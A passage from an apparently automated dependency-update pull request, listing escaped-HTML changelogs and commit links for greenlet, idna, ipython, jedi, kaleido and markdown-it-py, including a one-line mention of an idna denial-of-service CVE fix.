Python 3.15b1. This has not been\nreviewed by CPython core developers, but all tests pass. Binary\nwheels of this version won't work on earlier Python 3.15 builds and\nmay not work on later 3.15 builds.\u003c/li\u003e\n\u003cli\u003eFix the discrepancy in the way the two \u003ccode\u003egetcurrent\u003c/code\u003e APIs behave\nduring greenlet teardown. One API (the C API used by, e.g.,  gevent) raised a\n\u003ccode\u003eRuntimeError\u003c/code\u003e; the other (the Python \u003ccode\u003egreenlet.getcurrent\u003c/code\u003e API)\nreturned \u003ccode\u003eNone\u003c/code\u003e. This second way is incompatible with greenlet's type\nannotations, so \u003ccode\u003egreenlet.getcurrent\u003c/code\u003e now raises a\n\u003ccode\u003eRuntimeError\u003c/code\u003e as well.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e3.5.0 (2026-04-27)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eRemove the \u003ccode\u003eatexit\u003c/code\u003e callback. This callback caused greenlet APIs\nto become unavailable far too soon during interpreter shutdown. Now\nthey remain available while all \u003ccode\u003eatexit\u003c/code\u003e callbacks run. Sometime\nafter \u003ccode\u003ePy_IsFinalizing\u003c/code\u003e becomes true, they may begin misbehaving.\nBecause the order in which C extensions are finalized is undefined,\nC extensions that are sensitive to this need to check the results of\nthat function before invoking greenlet APIs. As a convenience,\n\u003ccode\u003ePyGreenlet_GetCurrent\u003c/code\u003e sets an exception and returns \u003ccode\u003eNULL\u003c/code\u003e\nwhen this happens (and \u003ccode\u003egreenlet.getcurrent\u003c/code\u003e begins returning\n\u003ccode\u003eNone\u003c/code\u003e); other greenlet C API functions have undefined behaviour.\nMethods invoked directly on pre-existing \u003ccode\u003egreenlet.greenlet\u003c/code\u003e\nobjects will continue to function at least until the greenlet C\nextension has been garbage collected and finalized.\u003c/p\u003e\n\u003cp\u003eSee \u003ccode\u003ePR 508 \u0026lt;https://github.com/python-greenlet/greenlet/pull/508\u0026gt;\u003c/code\u003e_.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e3.4.0 (2026-04-08)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003ePublish binary wheels for RiscV 64.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix multiple rare crash paths during interpreter shutdown.\u003c/p\u003e\n\u003cp\u003eNote that this now relies on the \u003ccode\u003eatexit\u003c/code\u003e module, and introduces\nsubtle API changes during interpreter shutdown (for example,\n\u003ccode\u003egetcurrent\u003c/code\u003e is no longer available once the \u003ccode\u003eatexit\u003c/code\u003e callback fires).\u003c/p\u003e\n\u003cp\u003eSee \u003ccode\u003ePR [#499](https://github.com/python-greenlet/greenlet/issues/499) \u0026lt;https://github.com/python-greenlet/greenlet/pull/499\u0026gt;\u003c/code\u003e_ by Nicolas\nBouvrette.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eAddress the results of an automated code audit performed by\nDaniel Diniz. This includes several minor correctness changes that\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-greenlet/greenlet/commit/b5e5fc43a51c27ecffa1b1c7107c91464a6b26e2\"\u003e\u003ccode\u003eb5e5fc4\u003c/code\u003e\u003c/a\u003e Preparing release 3.5.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-greenlet/greenlet/commit/c8e177413d34bc36ed56d2c185c232ab0538be90\"\u003e\u003ccode\u003ec8e1774\u003c/code\u003e\u003c/a\u003e Tweak wording in CHANGES about greenlet.getcurrent.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-greenlet/greenlet/commit/7fb10c570f37b3eb4c8909c6164fdfac3269ddb6\"\u003e\u003ccode\u003e7fb10c5\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/python-greenlet/greenlet/issues/510\"\u003e#510\u003c/a\u003e from python-greenlet/315\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-greenlet/greenlet/commit/9718ce5a23ea3360232b78a806a837d6c3d6183d\"\u003e\u003ccode\u003e9718ce5\u003c/code\u003e\u003c/a\u003e Add Py 3.15; make both API versions of getcurrent() consistent in raising Run...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-greenlet/greenlet/commit/276e08afc4ddba87e4366390e3eeaecd61ccb3b8\"\u003e\u003ccode\u003e276e08a\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/python-greenlet/greenlet/issues/509\"\u003e#509\u003c/a\u003e from python-greenlet/dependabot/github_actions/github...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-greenlet/greenlet/commit/32b0ad69828eb69d879c70dbee948e685268901b\"\u003e\u003ccode\u003e32b0ad6\u003c/code\u003e\u003c/a\u003e Bump pypa/gh-action-pypi-publish in the github-actions group\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-greenlet/greenlet/commit/173b692dc84288ef41572612ac744754f98eaa90\"\u003e\u003ccode\u003e173b692\u003c/code\u003e\u003c/a\u003e Back to development: 3.5.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-greenlet/greenlet/commit/c7acc72000572811d6462ebe01733a974f194990\"\u003e\u003ccode\u003ec7acc72\u003c/code\u003e\u003c/a\u003e Preparing release 3.5.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-greenlet/greenlet/commit/d08f99bf40801c5d57af6e13631c0ba68300ecf7\"\u003e\u003ccode\u003ed08f99b\u003c/code\u003e\u003c/a\u003e CHANGES: Update link from \u003ca href=\"https://redirect.github.com/python-greenlet/greenlet/issues/507\"\u003e#507\u003c/a\u003e to more full description in \u003ca href=\"https://redirect.github.com/python-greenlet/greenlet/issues/508\"\u003e#508\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-greenlet/greenlet/commit/fd3391e33cedc7a17a86059f18dfbec2b3a320bd\"\u003e\u003ccode\u003efd3391e\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/python-greenlet/greenlet/issues/508\"\u003e#508\u003c/a\u003e from python-greenlet/issue507-remove-atexit\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/python-greenlet/greenlet/compare/3.3.2...3.5.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `idna` from 3.11 to 3.17\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/kjd/idna/blob/master/HISTORY.md\"\u003eidna's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e3.17 (2026-05-28)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSubstantial 75% reduction in memory usage through new data\nstructures and some optimization in processing speed.\u003c/li\u003e\n\u003cli\u003eAdded a general 1024-character input length cap to the public\nvalidation, conversion, and codec entry points. This is well above\nany legitimate domain or label and guards against pathological\ninputs.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.16 (2026-05-22)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd a command-line interface (\u003ccode\u003epython -m idna\u003c/code\u003e, also available as\nthe \u003ccode\u003eidna\u003c/code\u003e script). Encodes or decodes one or more domains supplied\nas arguments or on standard input, with options to select A-label\nor U-label output and control error handling.\u003c/li\u003e\n\u003cli\u003eRaise the minimum supported Python version to 3.9\u003c/li\u003e\n\u003cli\u003eVarious code quality improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.15 (2026-05-12)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnforce DNS-length cap on individual labels early in \u003ccode\u003echeck_label\u003c/code\u003e,\nshort-circuiting contextual-rule processing for oversized input\nwhile staying compatible with UTS 46 usage.\u003c/li\u003e\n\u003cli\u003eTidy core helpers: hoist bidi category sets to module-level\nfrozensets (avoiding per-codepoint list construction), simplify\nlength checks, and reuse the shared \u003ccode\u003e_unicode_dots_re\u003c/code\u003e from\n\u003ccode\u003eidna.core\u003c/code\u003e in the codec module.\u003c/li\u003e\n\u003cli\u003eUse \u003ccode\u003eraise ... from err\u003c/code\u003e for proper exception chaining and\nswitch internal string formatting to f-strings.\u003c/li\u003e\n\u003cli\u003eAllow \u003ccode\u003eflit_core\u003c/code\u003e 4.x in the build backend.\u003c/li\u003e\n\u003cli\u003eExpand the ruff lint set (flake8-bugbear, flake8-simplify,\npyupgrade, perflint) and apply the surfaced fixes; pin lint CI\nto Python 3.14.\u003c/li\u003e\n\u003cli\u003eAdd Dependabot configuration for GitHub Actions.\u003c/li\u003e\n\u003cli\u003eConvert README and HISTORY from reStructuredText to Markdown.\u003c/li\u003e\n\u003cli\u003eReference CVE-2026-45409 for the 3.14 advisory in place of the\ninitial GHSA identifier.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks to Felix Yan, Stan Ulbrych, and metsw24-max for\ncontributions to this release.\u003c/p\u003e\n\u003ch2\u003e3.14 (2026-05-10)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eRemoved opportunity to process long inputs into quadratic\ntime by rejecting oversize inputs up-front. Closes a bypass\nof the CVE-2024-3651 mitigation. [CVE-2026-45409]\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks to Stan Ulbrych for reporting the issue.\u003c/p\u003e\n\u003ch2\u003e3.13 (2026-04-22)\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/f48619c4cea6859b938d560fdd9feb898e678567\"\u003e\u003ccode\u003ef48619c\u003c/code\u003e\u003c/a\u003e Release 3.17\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/7421ba8003227f816142ab40178e3a7d204e6847\"\u003e\u003ccode\u003e7421ba8\u003c/code\u003e\u003c/a\u003e Pre-release 3.17rc0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/22ebb73b164081f209449b50162eb7ce086e96a4\"\u003e\u003ccode\u003e22ebb73\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/kjd/idna/issues/251\"\u003e#251\u003c/a\u003e from kjd/structure-optimizations\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/2a7ac0a58c788d50112a5003af545a83807fb108\"\u003e\u003ccode\u003e2a7ac0a\u003c/code\u003e\u003c/a\u003e Drop redundant parallel-arrays comment from uts46data\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/354eee9850a7b2962b65ae02010f7ebd9c99b7ed\"\u003e\u003ccode\u003e354eee9\u003c/code\u003e\u003c/a\u003e Apply ruff format to uts46data.py\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/8c34ffcab603b4a7a727d4e286b1f3342813281d\"\u003e\u003ccode\u003e8c34ffc\u003c/code\u003e\u003c/a\u003e Refactor uts46data into parallel arrays\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/1189629e8a319f7c2b4678b5716c180ebd97de03\"\u003e\u003ccode\u003e1189629\u003c/code\u003e\u003c/a\u003e Range-encode joining_types for compact representation\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/f90b87adc6b6b2a591dfc7fb3f8e47870dc81722\"\u003e\u003ccode\u003ef90b87a\u003c/code\u003e\u003c/a\u003e Generic length limit for functions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/d6ffd28be164dfbd3ebca8b3396e39d191f4909b\"\u003e\u003ccode\u003ed6ffd28\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/kjd/idna/issues/247\"\u003e#247\u003c/a\u003e from kjd/release-3.16\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/6d1a0de52a8b4690f1b2a89829aa85ff1de3635a\"\u003e\u003ccode\u003e6d1a0de\u003c/code\u003e\u003c/a\u003e Release 3.16\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/kjd/idna/compare/v3.11...v3.17\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `ipython` from 9.12.0 to 9.14.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/9d1f24b9687279362b66f4e8c8a36ffde895a05d\"\u003e\u003ccode\u003e9d1f24b\u003c/code\u003e\u003c/a\u003e release 9.14.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/d8b9d11f2796300d914a88dc08de35ce93bc5aa0\"\u003e\u003ccode\u003ed8b9d11\u003c/code\u003e\u003c/a\u003e Add IPython 9.14 release notes (\u003ca href=\"https://redirect.github.com/ipython/ipython/issues/15228\"\u003e#15228\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/80cc1b963349ebc472b69f7da505cccebb2e6ad5\"\u003e\u003ccode\u003e80cc1b9\u003c/code\u003e\u003c/a\u003e Apply suggestions from code review\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/99feaadc543d43abc9287734651f4b618305a6bb\"\u003e\u003ccode\u003e99feaad\u003c/code\u003e\u003c/a\u003e Prepare release notes for 9.14\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/d0f27b7c656568b30d26bfcbe4232a6254abd64c\"\u003e\u003ccode\u003ed0f27b7\u003c/code\u003e\u003c/a\u003e directive typo (\u003ca href=\"https://redirect.github.com/ipython/ipython/issues/15225\"\u003e#15225\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/85f520ed0bbfb7a17d91ce18fd9dfefb8c2acfdd\"\u003e\u003ccode\u003e85f520e\u003c/code\u003e\u003c/a\u003e directive typo\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/4c3e934d97015e18f90c1b91d0b1d7936ae81d77\"\u003e\u003ccode\u003e4c3e934\u003c/code\u003e\u003c/a\u003e Fix docstring formatting for prompt_line_number_format help text (\u003ca href=\"https://redirect.github.com/ipython/ipython/issues/15224\"\u003e#15224\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/4f88be10853e080303b51a71ce13a550297368db\"\u003e\u003ccode\u003e4f88be1\u003c/code\u003e\u003c/a\u003e DOC: Fix RST inline literal warning in prompt_line_number_format docstring\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/37211dc6d4ab956a7b2ad851a0c10a359a8f87e1\"\u003e\u003ccode\u003e37211dc\u003c/code\u003e\u003c/a\u003e DOC: Add sphinx_toml to docs/requirements.txt\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/433aa8e69e71c6a2caa53621c0a670141c617c5d\"\u003e\u003ccode\u003e433aa8e\u003c/code\u003e\u003c/a\u003e Fix broken 'Edit on GitHub' link for auto-generated API docs (\u003ca href=\"https://redirect.github.com/ipython/ipython/issues/15218\"\u003e#15218\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/ipython/ipython/compare/9.12.0...9.14.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `jedi` from 0.19.2 to 0.20.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/davidhalter/jedi/blob/master/CHANGELOG.rst\"\u003ejedi's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e0.20.0 (2026-05-02)\n+++++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003ePython 3.14 support\u003c/li\u003e\n\u003cli\u003eRemoved support for Python 3.8 and 3.9\u003c/li\u003e\n\u003cli\u003eUpgraded Typeshed\u003c/li\u003e\n\u003cli\u003eBetter support for Final/ClassVar\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e__new__\u003c/code\u003e is now also recognized as a signature and TypeVar inference\u003c/li\u003e\n\u003cli\u003eSupport for \u003ccode\u003eSelf\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eSupport for \u003ccode\u003eTypeAlias\u003c/code\u003e, generics for \u003ccode\u003etype[...]\u003c/code\u003e and \u003ccode\u003etuple[...]\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/davidhalter/jedi/commit/3102215478fe07b965dcd8221c17436d1dd7e8ac\"\u003e\u003ccode\u003e3102215\u003c/code\u003e\u003c/a\u003e Move the type parameter syntax tests so that it works for all versions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/davidhalter/jedi/commit/1b37f2eb946e825cbc2887c6dd34ee046f0ae68c\"\u003e\u003ccode\u003e1b37f2e\u003c/code\u003e\u003c/a\u003e Prepare for the 0.20.0 release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/davidhalter/jedi/commit/8e4df5cc0ec511db1af6d358182b1fb7c1e0cbff\"\u003e\u003ccode\u003e8e4df5c\u003c/code\u003e\u003c/a\u003e Make sure the new generic syntax does not fail with latest parso\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/davidhalter/jedi/commit/4c9dbcca0329454b638bfa32e2825bedcfdf0eac\"\u003e\u003ccode\u003e4c9dbcc\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/davidhalter/jedi/issues/2098\"\u003e#2098\u003c/a\u003e from davidhalter/updates\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/davidhalter/jedi/commit/fedb1a5eb0d74446f6d431db2920ab5f1e1d5b18\"\u003e\u003ccode\u003efedb1a5\u003c/code\u003e\u003c/a\u003e Fix 3.10 tests in one more case\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/davidhalter/jedi/commit/87e782f9c82de7297e243a770ac8888570bffa8e\"\u003e\u003ccode\u003e87e782f\u003c/code\u003e\u003c/a\u003e Fix flake8\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/davidhalter/jedi/commit/cd52d982e10ac54f0ebef06e0bd414f79589998a\"\u003e\u003ccode\u003ecd52d98\u003c/code\u003e\u003c/a\u003e Fixes to get the tests passing for 3.10\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/davidhalter/jedi/commit/d0b11806d4d1def377234bc2dc512992c997a977\"\u003e\u003ccode\u003ed0b1180\u003c/code\u003e\u003c/a\u003e Finally make tests work for 3.14\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/davidhalter/jedi/commit/8520a9958b489bd8d30cf20b4d2798f7289aab45\"\u003e\u003ccode\u003e8520a99\u003c/code\u003e\u003c/a\u003e Implement support for TypeVar inference for \u003cstrong\u003enew\u003c/strong\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/davidhalter/jedi/commit/55e5f0cb92dd92d5bdc80ecfc38664a1afd921d1\"\u003e\u003ccode\u003e55e5f0c\u003c/code\u003e\u003c/a\u003e Implement new-style unions with TypeVars\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/davidhalter/jedi/compare/v0.19.2...v0.20.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `kaleido` from 1.2.0 to 1.3.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/plotly/kaleido/releases\"\u003ekaleido's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.3.0\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAllow for request headers to be added to Choreographer calls [\u003ca href=\"https://redirect.github.com/plotly/Kaleido/pull/446\"\u003e#446\u003c/a\u003e]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eSignificant refactor, better organization\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ewrite_fig\u003c/code\u003e and \u003ccode\u003e_from_object\u003c/code\u003e now take an additional argument:\n\u003ccode\u003ecancel_on_error: bool, default False\u003c/code\u003e. See docs.\u003c/li\u003e\n\u003cli\u003eUpdate Choreographer to v1.3.0 [\u003ca href=\"https://redirect.github.com/plotly/Kaleido/pull/449\"\u003e#449\u003c/a\u003e]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDeprecated\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUnused \u003ccode\u003epath\u003c/code\u003e argument for \u003ccode\u003ecalc_fig\u003c/code\u003e was deprecated.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFixed race condition where two render tasks would choose the same filename\u003c/li\u003e\n\u003cli\u003eFix issue where exporting large figures could cause hang [\u003ca href=\"https://redirect.github.com/plotly/Kaleido/pull/442\"\u003e#442\u003c/a\u003e], with thanks to \u003ca href=\"https://github.com/EliasTalcott\"\u003e\u003ccode\u003e@​EliasTalcott\u003c/code\u003e\u003c/a\u003e for the contribution!\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/plotly/Kaleido/blob/master/CHANGELOG.md\"\u003ekaleido's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.3.0\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAllow for request headers to be added to Choreographer calls [\u003ca href=\"https://redirect.github.com/plotly/Kaleido/pull/446\"\u003e#446\u003c/a\u003e]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eSignificant refactor, better organization\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ewrite_fig\u003c/code\u003e and \u003ccode\u003e_from_object\u003c/code\u003e now take an additional argument:\n\u003ccode\u003ecancel_on_error: bool, default False\u003c/code\u003e. See docs.\u003c/li\u003e\n\u003cli\u003eUpdate Choreographer to v1.3.0 [\u003ca href=\"https://redirect.github.com/plotly/Kaleido/pull/449\"\u003e#449\u003c/a\u003e]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDeprecated\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUnused \u003ccode\u003epath\u003c/code\u003e argument for \u003ccode\u003ecalc_fig\u003c/code\u003e was deprecated.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFixed race condition where two render tasks would choose the same filename\u003c/li\u003e\n\u003cli\u003eFix issue where exporting large figures could cause hang [\u003ca href=\"https://redirect.github.com/plotly/Kaleido/pull/442\"\u003e#442\u003c/a\u003e], with thanks to \u003ca href=\"https://github.com/EliasTalcott\"\u003e\u003ccode\u003e@​EliasTalcott\u003c/code\u003e\u003c/a\u003e for the contribution!\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.3.0rc0\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSignificant refactor, better organization\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ewrite_fig\u003c/code\u003e and \u003ccode\u003e_from_object\u003c/code\u003e now take an additional argument:\n\u003ccode\u003ecancel_on_error: bool, default False\u003c/code\u003e. See docs.\u003c/li\u003e\n\u003cli\u003eUnused \u003ccode\u003epath\u003c/code\u003e argument for \u003ccode\u003ecalc_fig\u003c/code\u003e was deprecated.\u003c/li\u003e\n\u003cli\u003eFixed race condition where two render tasks would choose the same filename\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/plotly/Kaleido/commit/b7a00c41895ab71b67e5b89b40f186c3f1cecbed\"\u003e\u003ccode\u003eb7a00c4\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/plotly/kaleido/issues/451\"\u003e#451\u003c/a\u003e from plotly/release-v1.3.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/plotly/Kaleido/commit/423a4f1cc6cbc701f9238281d63324508f12a272\"\u003e\u003ccode\u003e423a4f1\u003c/code\u003e\u003c/a\u003e Update setuptools config to find required subpackages\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/plotly/Kaleido/commit/28131a743143cc5d134c6e962b603ff3a5ed6253\"\u003e\u003ccode\u003e28131a7\u003c/code\u003e\u003c/a\u003e Updates for release v1.3.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/plotly/Kaleido/commit/f72dc86fa75afbca8756fcd9c9b5af550f038d75\"\u003e\u003ccode\u003ef72dc86\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/plotly/kaleido/issues/366\"\u003e#366\u003c/a\u003e from tschm/patch-3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/plotly/Kaleido/commit/0c5e89030709bc873806c08542ae66afea304f71\"\u003e\u003ccode\u003e0c5e890\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/plotly/kaleido/issues/450\"\u003e#450\u003c/a\u003e from plotly/cam/js-dependency-updates-may-2026\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/plotly/Kaleido/commit/4e95de54ad7874e254665444070cf613104749f5\"\u003e\u003ccode\u003e4e95de5\u003c/code\u003e\u003c/a\u003e Bump pygments from 2.19.2 to 2.20.0 in /src/py\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/plotly/Kaleido/commit/90ddc9d7e83d4b27cc11a44a9ca15c5d2c6c5688\"\u003e\u003ccode\u003e90ddc9d\u003c/code\u003e\u003c/a\u003e Bump urllib3 from 2.2.3 to 2.6.3 in /src/py\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/plotly/Kaleido/commit/f9b850eb38d7d9bb3f24258012d776f03ad355a0\"\u003e\u003ccode\u003ef9b850e\u003c/code\u003e\u003c/a\u003e chore: Update JS dependencies for security fixes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/plotly/Kaleido/commit/0978e65f23fbba486d005df1508e008a080d20e4\"\u003e\u003ccode\u003e0978e65\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/plotly/kaleido/issues/432\"\u003e#432\u003c/a\u003e from plotly/dependabot/npm_and_yarn/src/js/minimatch-...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/plotly/Kaleido/commit/b639582c0416f48a682ad01d157af22881d94f75\"\u003e\u003ccode\u003eb639582\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/plotly/kaleido/issues/429\"\u003e#429\u003c/a\u003e from plotly/dependabot/npm_and_yarn/src/js/qs-6.14.2\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/plotly/kaleido/compare/v1.2.0...v1.3.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `markdown-it-py` from 4.0.0 to 4.2.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/executablebooks/markdown-it-py/releases\"\u003emarkdown-it-py's 